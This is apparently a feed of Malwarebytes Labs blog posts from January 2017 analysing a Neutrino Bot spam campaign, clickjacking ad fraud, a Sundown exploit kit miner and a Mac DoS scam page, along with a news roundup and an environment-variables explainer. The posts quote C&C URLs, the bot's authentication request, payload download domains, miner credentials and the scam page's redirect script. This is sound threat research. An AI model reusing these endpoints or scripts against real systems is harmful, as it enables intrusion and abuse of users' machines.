Techie Feeds

Post-holiday spam campaign delivers Neutrino Bot

Malwarebytes - Wed, 01/11/2017 - 16:00

This post was co-authored by @hasherezade and Jérôme Segura

During the Christmas season and early into the new year, we noticed a sharp decrease in spam volume, perhaps as online criminals took a break from their malicious activities and popped the champagne to celebrate. It could also have been a time to regroup and plan new strategies for the upcoming year.

In any case, over the weekend we observed a large new campaign purporting to be an email from ‘Microsoft Security Office’ with a link to a full security report (Microsoft.report.doc). This was somewhat unexpected, as typically the malicious Office files are directly attached to the email. Instead, the files are hosted on various servers with a short time to live window.

The booby-trapped document asks users to enable macros in order to launch the malicious code.

Neutrino Bot

If the macro executes, the final payload will be downloaded and executed. This is Neutrino bot – which we had analyzed over a year ago and that can:

  • perform DDoS attacks
  • capture keystrokes, do form grabbing, take screenshots
  • spoof DNS requests
  • download additional malware
Analyzed sample Details

After deploying the sample, it installs itself in %APPDATA% in a folder called “UmJn“. This folder name is typical for the particular edition of Neutrino Bot:

It starts connecting to the C&C in order to fetch the commands and perform the malicious actions by querying a script called “tasks.php“.

The list of URLs is hardcoded in the bot in the form of a Base64 string:

URLs extracted from this sample:

http://saferunater.top/n/tasks.php http://saferunater.xyz/n/tasks.php http://saferunater.space/n/tasks.php http://godomenbit.bit/n/tasks.php

Neutrino uses a very simple method of authentication – it sends a cookie with a hardcoded value:

POST %s HTTP/1.0 Host: %s User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0 Content-type: application/x-www-form-urlencoded Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b Content-length: %i

In the previously described version it was md5(“admin”). This time it is:

"bc00595440e801f8a5d2a2ad13b9791b" -> md5("just for fun")

While the goals of the bot and major features didn’t change much, the code seems to be partially rewritten in comparison to the leaked version 3.9.4.

Here is the old version, reporting to the CnC:

The new version – that seems to be 5.2 – is much less verbose. It doesn’t use any strings that will indicate purpose of any particular value. Additionally, some of the used functions are loaded dynamically and identified by checksums for the purpose of decreasing code readability:

The features are also reorganized. For example, there is still a feature of making screenshots of the victim’s desktop – but its implementation details have changed:

Screen grabbing is a triggered by a command from the C&C:

The created screenshot is immediately sent to the C&C.

In the past, the same feature was implemented along with the keylogger.

The responsible thread is deployed and the screenshot taken periodically and saved to the logs along with other grabbed content. When the logs’ size exceeds a defined threshold, they are uploaded to the C&C:

The implemented changes improved code quality separating the particular features and give the operator more control on its execution. Still, the code is not obfuscated but the authors tried to hide some strings that explicitly show the purpose of the particular commands.

Just like in the previous case we are dealing with a fully-fledged multipurpose bot – with various features allowing to steal data and invade privacy, but also to use infected computers for DDoS attacks or download other malware.

Protection

It is important to remember to be particularly careful with Office documents masquerading as invoices, or other such reports that leverage the macro feature to execute code that will download and retrieve the actual payload. As an end user, do not enable macros unless you completely trust the file or are running it in a virtualized environment. As an IT admin, you can set policies to permanently disable macros.

Malwarebytes users are protected from this threat via the web or exploit protection modules.

IOCs:

Malicious doc:

agranfoundation[.]org/Microsoft[.]report[.]doc
xn--hastabakc-2pbb[.]net/Microsoft[.]report[.]doc
ecpi[.]ro/Microsoft[.]report[.]doc
ilkhaberadana[.]com/Microsoft[.]report[.]doc
cincote[.]com/Microsoft[.]report[.]doc
mallsofjeddah[.]com/Microsoft[.]report[.]doc
dianasoligorsk[.]by/Microsoft[.]report[.]doc

8dd66dd191c9f0d2f4b5407e5d94e815e8007a3de21ab16de49be87ea8a92e8d

Neutrino bot:

www.endclothing[.]cu[.]cc/nn.exe

87b7e57140e790b6602c461472ddc07abf66d07a3f534cdf293d4b73922406fe
b1ae6fc1b97db5a43327a3d7241d1e55b20108f00eb27c1b8aa855f92f71cb4b
ca64848f4c090846a94e0d128489b80b452e8c89c48e16a149d73ffe58b6b111

Categories: Techie Feeds

Explained: Environmental variables

Malwarebytes - Tue, 01/10/2017 - 19:07

Sometimes when you are looking for instructions to troubleshoot software issues or adapt software to your liking and you are looking at the knowledge base (KB) of said software, you will run into the use of environmental variables. Environmental variables are a Windows feature that describe certain important machine characteristics. These characteristics can be different for every machine, but they are very important when describing the path to certain files and folders. Not only can they vary from one machine to another, some are even different for other users of the same system.

Well-known examples of environmental variables are %COMPUTERNAME% and %USERNAME%. The notation – surrounded by percentage signs – tells you that an environmental variable is the object of the description. You can get a quick view of the variables that are preset on your system by using the following command in the command prompt: set.

This will result in a listing similar to this one:

Note that the variables themselves will be listed without the %% signs.

You can use Powershell to get a prettier version of the same list. The command to use is dir env: (see the header of this article for a part of that list).

Another way to access and change environmental variables is by visiting the Control Panel > System and Security > System screen. Select Advanced System Settings and on the Advanced tab, you should see a button labeled Environmental Variables… Click that button and you will see your environmental variables split out in User variables and System variables.

Here you can add, edit, and delete entries, but please be careful when doing so. Some of them are very much needed just the way they are and you can wreak havoc by making the wrong choices.

You may also notice that some programs you have installed add their own environmental variables to the “set-list”. We will focus on the standard Windows environmental variables as those are often used to locate certain files and folders. But in the KB articles we mentioned earlier, you may find that they use the environmental variables created by their own installer as well.

One way of testing what all these environmental variables mean is to paste or type them in a run command. Try it for example with %APPDATA%, which is an environmental variable that you will find in a lot of KB type of articles.

On a standard Windows 7 system, typing %APPDATA% takes you to the C:\Users\%USERNAME%\AppData\Roaming folder location. This is exactly why environmental variables are useful: if the folder with that function is in a different location on your computer, it automatically takes you to that location. If you type %APPDATA% on a default Windows XP system, it opens C:\Documents and Settings\%USERNAME%\Application Data folder location.

Of course, environmental variables are not only used to make KB articles more widely usable. They are also used in batch files and other programs. This saves system administrators a lot of work as he can use the same script for several computers, for example by utilizing the %COMPUTERNAME%  and %USERNAME% variables. Please note that %USERNAME% relates to the currently logged on user and not to other users of the same system.

Summary

This post is intended to make normal users aware of the existence and use of environmental variables, a Windows feature that is often only known to programmers and other advanced users.

Related links:

 

Pieter Arntz

Categories: Techie Feeds

Clickjacking campaign abuses Google Adsense, avoids ad fraud bots

Malwarebytes - Tue, 01/10/2017 - 15:51

Ad fraud is one of many issues that contribute to the ad industry’s negative image these days. Unlike malvertising which affects end users by infecting them with malware, ad fraud costs advertisers billions of dollars in adverts that were never seen by real humans.

The case we are describing today shows some interesting tricks to have people click on camouflaged adverts while thinking they are clicking on the play button of a video. The ultimate goal is to generate pay per impression and pay per click revenues from what looks like clean and trusted traffic.

In addition, the crooks are tracking the movements and clicks of the mouse while the user is on the fraudulent page, in order to be able to tell if their victim is an actual person or simply a bot. If the latter is detected, the page will automatically redirect to google.com to prevent any accidental and ‘tainted’ click on the advert.

Apparently the bad guys are concerned about ad fraud too when it matters to them…

Different means, same end goal

There are different ways criminals go about profiting from ad fraud, the most common one being via compromised computers (bots) that view or click on ads unbeknownst to their users. Malware like Bedep can mimic real user activity in hidden desktops and defraud millions of ad impressions a day.

Late last year White Ops, a company that specializes in ad fraud research, exposed a large operation dubbed Methbot involving a different method to generate millions in fraudulent ad revenues. Rather than relying on end user machines, the crooks leveraged data centers to create bot farms. Why bother with unreliable consumer PCs when you can create an army of well-trained ad fraud bots running at optimal speed on server racks?

There are many other ways to game the ad ecosystem and they don’t always involve infecting machines or using bot farms. Sometimes ad fraud can be done in a very transparent manner that relies on a real human to perform an action, making it harder for anti-fraud systems to detect. For instance, clickjacking, a technique that consists of tricking the user to click something that is actually producing a hidden malicious action has been used in the past to do click fraud.

The case we are going to have a look at today is actually related to a clickjacking attack we wrote about before. We discovered this ad fraud campaign via a high profile malvertising chain we have come across already that typically redirects to exploit kits. Visitors to a high traffic adult site are automatically redirected to what appears to be another adult streaming video page. What they don’t know is that it is completely fake and underneath of it are websites displaying paid adverts and generating the crooks money for each impression and click.

Gates

The scenario here is that traffic to some popular adult websites will get redirected via malicious advertising to one of several fake blogs with topics ranging anywhere from wedding tips, pest control, or appliances.

The redirection chain includes the mandatory passage through what we call a gate whose objective is typically to inspect incoming traffic and take actions.

Within one of those gates, we noticed interesting bits of code that was meant to “fingerprinting” visitors to collect their IP address, User-Agent, and screen resolution via a POST request, upon the initial redirection from malvertising.

Figure 1: Fingerprinting code at the gate (click to enlarge)

This information is typically harvested by most websites for stats and optimization purposes, but given the explicit use of an appropriately named getfingerprint.php file, we can assume that the fraudsters were trying to identify real users versus crawlers or repeated visits of the same page.

Figure 2: Web traffic from malvertising to gate (click to enlarge)

A façade: adult gallery hides fake blog

Content is one of those things that is very important to search engines and other crawlers as it ultimately gives more value to a website. A long time ago, blackhat SEO criminals used a technique known as keyword stuffing which aimed at getting the site ranked high in the search engine result pages (SERP), but it is easy to detect nowadays.

Plagiarism is still very effective, and copy and paste has never been easier. It’s a cheap way to get some decent content with little effort. In this particular campaign, we witnessed several websites that had been created recently and filled with new blog entries.

It didn’t take long to find out where the write-ups were stolen from: mainly sites like Ezine or Pinterest. The thieves didn’t even bother changing any of the wording, they simply did a copy/paste to populate each of their fraudulent website with dozens of entries.

Figure 3: A fake blog about weddings with stolen content (click to enlarge)

Figure 4: Original content used by fake blog found on Ezine (click to enlarge)

If you visited one of those sites directly, you would see what seems to be a site giving advice for weddings accompanied by a few adverts powered by Google’s DoubleClick, which is quite typical for any website that needs to pay for its operating costs. However, only crawlers most likely visited those websites directly as the motives for setting them up was very clear: to defraud advertisers via hijacked traffic.

A layer containing adult images is superimposed such that both content is displayed in the browser, but only the top layer (adult material) is visible to the eye.

Figure 5: The wedding blog turned into an adult portal thanks to an overlay (click to enlarge)

This is important because the crooks want to load the underlying blog and its content which includes paid adverts so that they can monetize on ad impressions, while at the same time tricking visitors into thinking they are still accessing their adult videos.

Figure 6: Diagram of ad impression fraud via adult page overlay (click to enlarge)

Figure 7: Web traffic from gate to fake blog, to advert (click to enlarge)

Stealing (real) users’ clicks

The first stage of this ad fraud campaign consisted of showing a thumbnail of adult videos while displaying hidden adverts, but that is not all. Users are conned into clicking to actually view any particular video, which takes us to the second part, that involves Pay Per Click (PPC) fraud.

The user is presented with a single adult video page but there is no actual video to be played, as it is just a screenshot designed to mimic a video player with the play button and timeline bar.

The goal is to get users to click on a hidden advert, but only after some validation checks that ensure the clicks are from genuine humans. This is somewhat ironic for fraudsters to check against bots.

Figure 8: Diagram of fake video page which tricks the user into clicking play button (click to enlarge)

Figure 9: The hidden advert revealed with its placement over the video’s play button (click to enlarge)

One can actually show the hidden advert (as seen in Figure 9) simply by clicking in the browser’s address bar which results in the banner coming at the forefront. Similarly, giving focus back to the page by clicking anywhere in it will put the banner back in hidden mode again.

The crooks use JavaScript code to check for user activity, in particular mouse movements and clicks. Indeed, bots often do very programmatic and predictable actions that can be detected as patterns of non real human activity. The detector.js script from the fake blog will attempt to detect those emulated actions and immediately redirect the browser to Google’s homepage if it identifies any.

Figure 10: Checking for mouse activity to ensure clicks are legitimate (click to enlarge)

For instance, if a click is detected but the mouse hasn’t moved at all, this is a suspicious behaviour. Same goes for the mouse moving to specific onscreen coordinates at particular time frames. Malware that tries to emulate user activity will typically do some scrolls on screen or clicks, but those are usually not very random or unique enough and they get repeated from one infected machine to another.

Online criminals make money by exploiting weaknesses in systems and people which make them very aware of certain pitfalls that they need to avoid. We have seen in the past malware closing the security hole that allowed it to get in, or even remove a previous infection. Similarly, when it comes to ad fraud the bad guys know very well how to ensure they are getting paid and have less chances of getting caught.

It also clears the browser back button URL history such that the user cannot revisit the same page again:

Figure 11: Changing the ‘back URL’ based on mouse activity (click to enlarge)

If a real human clicked to view the non-existing video, they actually clicked on the hidden ad, thereby generating money for the crooks. Whoever got duped will soon realize that this was just a waste of time and that no video actually loaded. Users are less likely to report on this fraud due to the nature of the content they were trying to view.

In the meantime, the fraudsters behind this operation are making money for each view and click. Given that they only have to pay for cheap incoming traffic versus the more expensive Google Ads, this is a profitable business model.

Figure 12: Web traffic from fake blog to click fraud (click to enlarge)

Link with previous campaign

In January of 2016, we wrote about a clickjacking attack taking advantage of the new European law on browser cookies. Similarly, users were tricked into clicking on ‘I accept cookies’ which actually clicked on an ad banner and defrauded legitimate advertisers.

The domain names used then and now have a similar pattern with the word ‘webhosting‘ in it, which could be a coincidence of course, but is noteworthy since both campaigns use clickjacking to abuse Google AdSense.

Figure 13: Traffic capture from the European cookie clickjacking campaign

Another interesting aspect is the use of filters (i.e. filter.php, process.php) to weed out bots or machines that are already blacklisted. This was not something we had covered in our original blog post but by comparing with past captures, we can see the idea is very similar, although not as sophisticated.

Closing thoughts

There aren’t many industries that generate as many heated debates as the ad industry does. One argument that you will often hear is that ad agencies, networks and publishers still make money whether an ad is malicious or never was actually viewed by anyone. There is also a direct correlation between digital ad spend and ad fraud over the past few years.

This does not mean that the involved parties are desensitized to malware or fraud (they invest a lot of resources to combat that problem). In fact, treating them as ‘they’ is a poor choice since it assumes everyone is on the same level. We know that there are some networks/publishers that turn a blind eye – or worse – are directly affiliated with criminal gangs, while others are actually taking an active stance to fight malware and fraud.

The problem remains that there is an ever growing concern from both users (adopting ad blockers at a fast pace) and advertisers, getting less and less bang for their buck. Just like with malvertising, as long as there is an economic gain, criminals will keep on pursuing their abuse to exploit advertising as a unique and profitable fraud and infection vector.

We have notified Google and passed along the necessary information about this abuse of their ad platform.

Further reading: IOCs:

Gates:

stockwebhosting[.]com
doctorwebhosting[.]com
triwebhosting[.]com
webhostingfashion[.]com

Fake blogs:

justhappymarriage[.]com
myamericansofa[.]com
instaautohire[.]com
bugcurb[.]com
bestautotariff[.]com
pestdomination[.]com
pleasedwedding[.]com
nicewashing[.]com
theusaappliance[.]com
topcaraccidentals[.]com
perfectpurification[.]com

Categories: Techie Feeds

A week in security (Jan 01 – Jan 07)

Malwarebytes - Mon, 01/09/2017 - 21:49

Last week, we pushed out an in-depth analysis of a Sundown exploit kit campaign dropping a miner for the cryptocurrency, Monero. Our researchers, hasherezade and Jérôme Segura, analyzed the kit and its payload during their investigation.

We also pushed out a report on a technical support page we found that performed a DoS attack against Mac systems. The said page did this by creating a multitude of email drafts, upon users visiting the fake site, that inundated the desktop, which in turn caused the entire system to freeze and run out of memory, rendering it unusable.

Below are notable news stories and security-related happenings:

  • Pokemon, Go? Augmented Reality Technology Faces Legal Reckonings In 2017. “While not a new technology, augmented reality (AR) became mainstream worldwide phenomena in 2016. But like any untested consumer technology, it faces fine-tuning to adopt to the laws and society around which it seeks to transform. One of the best examples is Niantic’s Pokémon Go AR game, a seminal platform launched in 2016 which uses AR technology to superimpose interactive Pokémon characters onto what a user’s mobile phone’s video camera captures. In addition to wide fame and success, the game has also run into an array of unique lawsuits.” (Source: LegalTech News)
  • Smart Devices May Soon Provide UK Police With Evidence Of Crime – Report. “Smart home devices, including fridges, washing machines, light bulbs and coffee-makers may soon provide police forces across the UK with critical data, linked to criminal investigations. Authorities believe that the internet-of-things (IoT) devices could potentially be used by detectives to gather digital crime scene evidence. According to Scotland Yard’s digital forensics chief Mark Stokes, IoT devices are likely to revolutionise crime-scene investigation. Detectives are being trained to identify digital footprints, which may help track events, in turn allowing authorities to establish the validity of alibis or root out inconsistencies in witnesses’ statements.” (Source: The International Business Times)
  • Data Breach Exposes US Army Doctor Details. “Sensitive details of health workers employed by the US military’s Special Operations Command (Socom) have been exposed in a data breach. The 11GB of data included social security numbers, names, addresses and salaries of some Socom staff.” (Source: The BBC)
  • Ransomware On Smart TVs Is Here And Removing It Can Be A Pain. “It took a year from proof of concept to in-the-wild attack, but ransomware for Android-based smart TVs is now here. As one victim discovered this Christmas, figuring out how to clean such an infection can be quite difficult. Ransomware for Android phones has already been around for several years and security experts have warned in the past that it’s only a matter of time until such malicious programs start affecting smart TVs, especially since some of them also run Android.” (Source: PC World)
  • Hackers Could Turn Your Smart Meter Into A Bomb And Blow Your Family To Smithereens – New Claim. “Smart meters are “dangerously insecure,” according to researcher Netanel Rubin – who claimed the gear uses weak encryption, relies on easily pwned protocols, and can be programmed to explode. The software vulnerability hunter derided global efforts to roll out the meters as reckless, saying the ‘dangerous’ devices are a risk to all connected smart home devices.” (Source: The Register)
  • Mind How You Grumble On Social Media: Crooks On Twitter Stealing Bank Details Of Customers Complaining About Glitches Online. “Savers who use social media to complain to their banks about technical glitches are having their details snatched by crooks. Criminals are lurking online waiting for banks to suffer technical problems so they can dupe unwitting customers into handing over information.” (Source: This is Money)
  • Ransomware Crime Bill Goes Into Effect In California. “Beware perpetrators of ransomware in California: Under a new bill that went into effect on Jan.1, you will now face four years in a state prison. Senate Bill 1137, which was signed in September, took effect on the first of the year. It updates the state’s penal code to differentiate the crime of ransomware from existing extortion statutes. Ransomware is generally malware downloaded into a computer or network that enables cyberthieves to lock systems up until a ransom is paid, usually via Bitcoin.” (Source: SC Magazine)
  • 54% Of Organizations Have Not Advanced Their GDPR Compliance Readiness. “More than half of organizations have failed to begin any work on meeting minimum General Data Protection Regulation (GDPR) compliance, according to a study conducted by Vanson Bourne. Intended to harmonize data security, retention and governance legislation across European Union (EU) member states, GDPR requires greater oversight of where and how sensitive data—including personal, credit card, banking and health information—is stored and transferred, and how access to it is policed and audited by organizations. GDPR will not only affect companies within the EU, but extend globally to the U.S. and other countries, impacting any company that conducts business in the region or with an EU organization.” (Source: Help Net Security)
  • Thai Army To Recruit Civilian ‘Cyber Warriors’ Following Anonymous’ Onslaught On Government Sites. “The Thai army is reportedly planning to recruit civilian “cyber warriors” in efforts to boost the government’s ability to respond to cyber threats. Civilian experts are slated to be employed to assist the government in combating cybercrime, as well as help the government improve its systems, according to reports. Thai army commander-in-chief Chalermchai Sittisat said: ‘We don’t have enough personnel with expertise in cyber security. Therefore, we need to recruit civilians for our centre, who can manage it properly and earn a reasonable salary,’ the Bangkok Post reported.” (Source: The International Business Times)
  • New Android Malware Attacks Your Wireless Router Through Your Phone. “There’s a new kind of Android malware that uses Android devices to attack wireless routers and control victims’ networks. The malware, which has been dubbed ;Switcher Trojan,; can leave victims vulnerable to a wide range of cyber attacks, phishing, data theft, and fraud. According to researchers at Kaspersky Lab, Switcher Trojan can redirect all traffic from devices connected to the WiFi network into the hands of cybercriminals. The Android malware infiltrates the wireless router’s admin interface with a predefined list of login and password combinations.” (Source: Mobile N Apps)
  • Fiat Chrysler And Google Team On Android In-car Tech. “Fiat Chrysler and Alphabet are already working together via Waymo, the former Google self-driving car project, and now Google is also teaming with the automaker for in-car system tech, using Android as the base for a new infotainment and connect car platform. The new FCA in-car system is called Uconnect, and uses Android 7.0 to deliver a range of features, including Android app compatibility alongside more traditional in-car controls like AC and heat, also with terrestrial radio.” (Source: TechCrunch)
  • Data Breaches Through Wearables Put Target Squarely On IoT In 2017. “Forrester predicts that more than 500,000 internet of things (IoT) devices will suffer a compromise in 2017, dwarfing Heartbleed. Drop the mic — enough said. With the sheer velocity of how the distributed denial-of-service (DDoS) attacks spread through common household items such as DVR players, makes this sector scary from a security standpoint.” (Source: CSO)
  • Latest WhatsApp Scam Infects Users With Banking Malware. “Hackers have started a new campaign in which they have chosen WhatsApp as the primary malware-distributing platform. In this campaign, hackers are distributing the malware through 2 files namely ‘NDA-ranked-8th-toughest-College-in-the-world-to-get-into.xls’ and ‘NIA-selection-order-.xls’ respectively. These files are being circulated via WhatsApp in the form of authentic word files obtaining sensitive information from users which include online banking credentials, PIN codes and similar details.” (Source: HackRead)
  • Ransomware Has Evolved, And Its Name Is Doxware. “In recent years, ransomware has become a growing concern for companies in every industry. Between April 2015 and March 2016, the number of individuals affected by ransomware surpassed 2 million — a 17.7% increase from the previous year. Ransomware attacks function by breaching systems, usually through infected email, and locking important files or networks until the user pays a specified amount of money.” (Source: Dark Reading)
  • Schools Warned About Cold-calling Ransomware Attacks. “Schools and colleges are being warned to be on the lookout for ransomware attacks, after a wave of incidents where fraudsters attempted to trick educational establishments into opening dangerous email attachments. In itself that doesn’t sound that unusual. What makes the attacks unusual, however, is just how the attackers tricked users into clicking on the malware-infected attachments. They phoned up their victims.” (Source: BitDefender’s Hot For Security Blog)
  • Experts Warn Of Novel PDF-Based Phishing Scam. “The SANS Internet Storm Center published a warning on Wednesday about an active phishing campaign that utilizes PDF attachments in a novel ploy to harvest email credentials from victims. According to the SANS bulletin, the email has the subject line ‘Assessment document’ and the body contains a single PDF attachment that claims to be locked. A message reads: ‘PDF Secure File UNLOCK to Access File Content.'” (Source: Kaspersky’s Threatpost)
  • $247,000 KillDisk Ransomware Demands A Fortune, Forgets To Unlock Files. “The cost of ransomware reached close to $1 billion in 2016, and it’s not hard to see why. The malware family, which targets everything from Windows to Mac machines, executes procedures to encrypt files and disks before demanding a ransom payment in return for keys to decrypt and unlock compromised machines. However, it is not only the general public which is being targeted with everything from hospitals to schools and businesses now in the firing line.” (Source: ZDNet)
  • Koovla Ransomware Urges Users To Read Up On Security. “Security researchers have discovered an unusual ransomware variant which offers a decryption key not if victims pay up, but if they read two articles on how to stay safe from malware. Discovered by self-styled ‘ransomware hunter’ Michael Gillespie, the ‘Koovla’ variant is still in development, according to Bleeping Computer’s Lawrence Abrams.” (Source: InfoSecurity Magazine)
  • Stolen Passwords Fuel Cardless ATM Fraud. “Some financial institutions are now offering so-called “cardless ATM” transactions that allow customers to withdraw cash using nothing more than their mobile phones. But as the following story illustrates, this new technology also creates an avenue for thieves to quickly and quietly convert stolen customer bank account usernames and passwords into cold hard cash. Worse still, fraudulent cardless ATM withdrawals may prove more difficult for customers to dispute because they place the victim at the scene of the crime.” (Source: KrebsOnSecurity)
  • Japan Sees a Spike In Smart TVs Held Hostage. “Looks like cybercriminals are starting to hit people where it really hurts: Blocking their bingeing on Netflix, and watching sports and an array of niche TV shows from the dark recesses of the cable network world. Smart TVs, in other words. Japan alone has reported more than 300 ransomware attacks on smart TVs this year, marking a sharp increase in cyberattacks targeting internet of things (IoT) appliances, according to Trend Micro. Typically, the affected TVs will be locked, and a ransom message pops up asking for 10,000 yen (around $100) to be paid within 72 hours.” (Source: InfoSecurity Magazine)
  • Social Media Security Is Not Just For Kids – How Safe Are Your Profiles? “The news is full of the risks children face on the internet, not just in terms of predators but also in terms of the rights they might be signing away. Their details and the rights to any images they post may be compromised, says a report from the UK’s Children’s Commissioner, entitled Growing Up Digital. The commissioner calls for clearer terms and conditions so that kids are aware of what they’re getting into. No reasonable person would disagree with that, but you can’t help wondering whether adults could do with some education in the area as well.” (Source: Sophos’s Naked Security Blog)
  • Unsecure Routers, Webcams Prompt Feds To Sue D-Link. “The Federal Trade Commission on Thursday sued Taiwan-based D-link in federal court. The FTC alleges that D-link routers and webcams left ‘thousands of consumers at risk’ to hacking attacks. ‘Defendants have failed to take reasonable steps to protect their routers and IP cameras from widely known and reasonably foreseeable risks of unauthorized access, including by failing to protect against flaws which the Open Web Application Security Project has ranked among the most critical and widespread web application vulnerabilities since at least 2007,’ the FTC said in a complaint (PDF) filed in San Francisco federal court.” (Source: Ars Technica)

Safe surfing, everyone, and welcome, 2017!

The Malwarebytes Labs Team

Categories: Techie Feeds

The curious case of a Sundown EK variant dropping a Cryptocurrency Miner

Malwarebytes - Sat, 01/07/2017 - 01:29

This post was authored by @hasherezade and Jérôme Segura

We recently encountered an atypical case of Sundown EK in the wild – usually the landing page is obfuscated, but in this case there was plain JavaScript. The exploit was dropping some malicious payloads that we took for further analysis. It turned out that they are also atypical by many means. In this article, we will describe the details of our investigation.

Exploit Kit

This exploit kit has a different serving infrastructure than what we are used to seeing, but it is essentially the same Sundown EK that we know.

In comparison, here’s a fresh Sundown EK, using steganography where we can see that both EKs share the same Flash exploit.

The landing page for this variant has almost no obfuscation, which was a bit of an oddity:

The infrastructure for pushing this EK relies on a few domains all hosted on the same IP address:

The payload URL (pastetext.biz) is also tied to the same EK distributor, hinting at a single actor operation.

Payload – Cryptocurrency miner

Analyzed samples

Behavioral analysis

The application does not use any special trick in order to hide itself. It only tries to misguide the user with a process name. In the analyzed case it was called “Windows Backup”:

We can see it establishing some internet connection:

The network communication is pretty straightforward – everything goes in the clear.

First, the application connects to Pastebin an retrieves the stored note that seems to be set of parameters for some application. Looking at the link and keywords, we can easily guess that it is related to mining cryptocurrency:

Then, it logs itself into the service using login: ‘lovemonero2.worker@hotmail.com’ and a password ‘x’:

Unpacking

The initial sample is a 64bit PE file. During the initial assessment we found that it is packed by UPX, so I removed this layer using a standard UPX decompressor. As a result, I got the following PE file – with 3 resources:

I started from having a look at the recources, because often they contains (encrypted) payloads. In current case, all of them had structure reminding PE files – just slightly obfuscated:

See the suspicious string from the dumped resource file:

M."Uijt!qsphsbn!dboopu!cf!svo!jo!EPT!npef

It reminds of the string typical for the DOS stub:

L.!This program cannot be run in DOS mode

It was easy to deduce what method of obfuscation was used there – to each ASCII character value 1 was added. Knowing this, it was easy to write a decrypting function, i.e.:

def decode(data):     maxlen = len(data)     key = 1     decoded = bytearray()     for i in range(0, maxlen):         dec = (data[i] - key) & 0xFF         decoded.append(dec)     return decoded

As a result we got 3 PE files (each of them starts after the data appended at the beginning):

Two of them were legitimate DLLs: MSVCR120.dll – 32bit and 64bit versions. The remaining PE file was the real payload – again UPX compressed. It got it unpacked without any problems with the help of the original tool:

Curious links

A fast look at the strings referenced by the binary, revealed various commands, explaining the tool’s purpose:

We can easily guess that it is meant for mining some cryptocurrency (the default guess is Bitcoin – but is it really?).

As well as some curious links:

Following the links lead me to a Pastebin account for a user called “LoveMonero”:

And more interestingly, to his Github account:

The name of the user – LoveMonero – suggests that this application is not used to mine Bitcoins, but another cryptocurrency – Monero. This choice makes sense, because the pool of bitcoins is more and more saturated – and nowadays mining them is much more difficult  and resource-consuming than it was in the past, when this currency was still young.

He stored there not only the sourcecode of the tool, but also links with parameters (same as at Pastebin and in the binary)

The file was edited just 4 hours ago – it means it is still fresh and actively maintained.

In the same repo, we can find even the links from where the malware was downloaded during the campaign!

We can see that it is exactly the same link that was used by the Exploit Kit:

Linked executables:

As we can find out, the project is based on an opensource tool for mining cryptocurrencies: ccminer-cryptonight. However, there are some modifications.

Fetching the repository, we can find all the commits starting from 20-th November 2016:

The initial e-mail (possibly with the real data of the actor) was changed to the familiar name – lovemonero:

Inside the code we can find the same string that are referenced in the dropped payload, confirming the guess that this code is related to the dropped application:

From the binary:

However, the stored source code doesn’t seems to be complete.

Conclusion

This campaign looks strange to us due to the fact that it has been prepared in an extremely careless way. There were a lot of traces stored in the application as well as the Github profile.

Since the release of some opensource code of DDoS tools (Mirai) and ransomware (HiddenTear, Eda2) we can see the trend, that more and more novices are trying their luck in cybercrime. This application is yet another example of this tendency.

IOCs:

Domains:

empowernetwork1.us
empowernetwork2.us
empowernetwork3.us
empowernetwork4.us
empowernetwork5.us
empowernetwork6.us
empowernetwork7.us
empowernetwork8.us
empowernetwork9.us
empowernetwork1.biz
empowernetwork2.biz
empowernetwork3.biz
empowernetwork4.biz
website1.empowernetworkpackage.biz
website2.empowernetworkpackage.biz
website3.empowernetworkpackage.biz
website4.empowernetworkpackage.biz
website5.empowernetworkpackage.biz
website6.empowernetworkpackage.biz
website7.empowernetworkpackage.biz
website8.empowernetworkpackage.biz
website9.empowernetworkpackage.biz
website1.empowernetworksolutions.biz
website2.empowernetworksolutions.biz
website3.empowernetworksolutions.biz
website4.empowernetworksolutions.biz
website5.empowernetworksolutions.biz
website6.empowernetworksolutions.biz
website7.empowernetworksolutions.biz
website8.empowernetworksolutions.biz
website9.empowernetworksolutions.biz
empirenetworksol.com
kitempowernetwork.com
empowernetworkpackage.com
empowernetworksolutions.com
pastetext.biz
empowernetworkads.com

IPs:

149.202.164.86
158.69.87.196
158.69.86.203

Registrant Emails:

lovemonero@gmail.com
davidgreenwoodjazz@gmail.com

Flash exploit:

67d598c6acbd6545ab24bbd44cedcb825657746923f47473dc40d0d1f122abb6

Categories: Techie Feeds

Tech support scam page triggers denial-of-service attack on Macs

Malwarebytes - Thu, 01/05/2017 - 15:00

Tech support scammers have been using various themes to push fake alerts to scare users into calling for assistance. These fall into the ‘browlock’ category if they are via the browser and into the screen lockers category if they are actual malware that runs on the system.

Recently, there has been a trend for scammers to cause denial-of-service attacks against people’s computers. We documented it in early November with a specific HTML5 API (history.pushState) which caused the browser to freeze. Today we take a quick look at yet another technique that targets Mac OS users running Safari.

A newly registered scam website targeting Mac users was making the rounds late last year. Simply visiting the malicious site on an older version of MacOS would start creating a series of email drafts, which eventually cause the machine to run out of memory and freeze.

The malicious webpage will first determine the version of OS X via a user agent check and push two different versions of this denial-of-service (10 or 11):

if ((navigator.userAgent.match(/OS 10.1.1/i))) { location.replace("http://safari-get.com/11.php"); } else if ((navigator.userAgent.match(/OS 10.2/i))) { location.replace("http://safari-get.com/11.php"); }else { location.replace("http://safari-get.com/10.html");}

The first variant (10.html) has code that will keep drafting emails (but does not actually send them) incrementally and cover the previous open windows.

The second variant (11.php) will instead open up iTunes:

These flaws may have been fixed with macOS Sierra 10.12.2 as Mac users running a fully up-to-date OS do not seem to be affected by the Mail app DoS:

However, the second variant appears to still be capable of opening up iTunes, without any prompt in Safari:

Thanks to @TheWack0lian for pinging me back about this scam site and its DoS feature.

IOCs:

  • safari-get[.]com
  • safari-get[.]net
  • dean.jones9875@gmail.com
  • safari-serverhost[.]com
  • safari-serverhost[.]net
  • amannn.2917@gmail.com
Categories: Techie Feeds

Closing the gender gap in tech with RGSoC

Malwarebytes - Wed, 12/28/2016 - 17:00

The last couple of years saw a growth in diversity- and women-focused tech events and programs; suddenly, everyone seems to be worried about diversity in our industry. But why is diversity in technology something we should care about?

According to a study from the National Center for Women and Information Technology, in 2015 only 25% of computing occupations across the U.S. were held by women, in spite of women making up approximately 50% of the population. This number has been declining since the early 1990s, and is an even more frightening statistic when we think of the history of computing and the meaningful roles women had in Computer Science in the past: From the ENIAC operators of the 1940s to the developers of the Smalltalk language in the 1970s, women were a consistent part of information technology in the last century.

